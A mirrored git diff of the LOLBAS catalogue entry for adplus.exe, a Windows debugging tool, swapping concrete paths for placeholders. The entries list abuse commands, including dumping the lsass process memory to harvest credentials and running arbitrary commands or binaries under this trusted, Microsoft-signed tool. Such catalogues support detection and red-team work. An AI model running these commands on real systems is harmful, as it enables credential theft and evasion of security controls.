mirror of
https://github.com/LOLBAS-Project/LOLBAS
synced 2025-07-27 12:42:19 +02:00
@@ -4,14 +4,14 @@ Description: Debugging tool included with Windows Debugging Tools
|
||||
Author: mr.d0x
|
||||
Created: 2021-09-01
|
||||
Commands:
|
||||
- Command: adplus.exe -hang -pn lsass.exe -o c:\users\mr.d0x\output\folder -quiet
|
||||
- Command: adplus.exe -hang -pn lsass.exe -o {PATH_ABSOLUTE:folder} -quiet
|
||||
Description: Creates a memory dump of the lsass process
|
||||
Usecase: Create memory dump and parse it offline
|
||||
Category: Dump
|
||||
Privileges: SYSTEM
|
||||
MitreID: T1003.001
|
||||
OperatingSystem: All Windows
|
||||
- Command: adplus.exe -c config-adplus.xml
|
||||
- Command: adplus.exe -c {PATH:.xml}
|
||||
Description: Execute arbitrary commands using adplus config file (see Resources section for a sample file).
|
||||
Usecase: Run commands under a trusted Microsoft signed binary
|
||||
Category: Execute
|
||||
@@ -20,14 +20,14 @@ Commands:
|
||||
OperatingSystem: All Windows
|
||||
Tags:
|
||||
- Execute: CMD
|
||||
- Command: adplus.exe -c config-adplus.xml
|
||||
- Command: adplus.exe -c {PATH:.xml}
|
||||
Description: Dump process memory using adplus config file (see Resources section for a sample file).
|
||||
Usecase: Run commands under a trusted Microsoft signed binary
|
||||
Category: Dump
|
||||
Privileges: SYSTEM
|
||||
MitreID: T1003.001
|
||||
OperatingSystem: All Windows
|
||||
- Command: adplus.exe -crash -o "C:\temp\" -sc calc.exe
|
||||
- Command: adplus.exe -crash -o "{PATH_ABSOLUTE:folder}" -sc {PATH:.exe}
|
||||
Description: Execute arbitrary commands and binaries from the context of adplus. Note that providing an output directory via '-o' is required.
|
||||
Usecase: Run commands under a trusted Microsoft signed binary
|
||||
Category: Execute
|
||||
|
Reference in New Issue
Block a user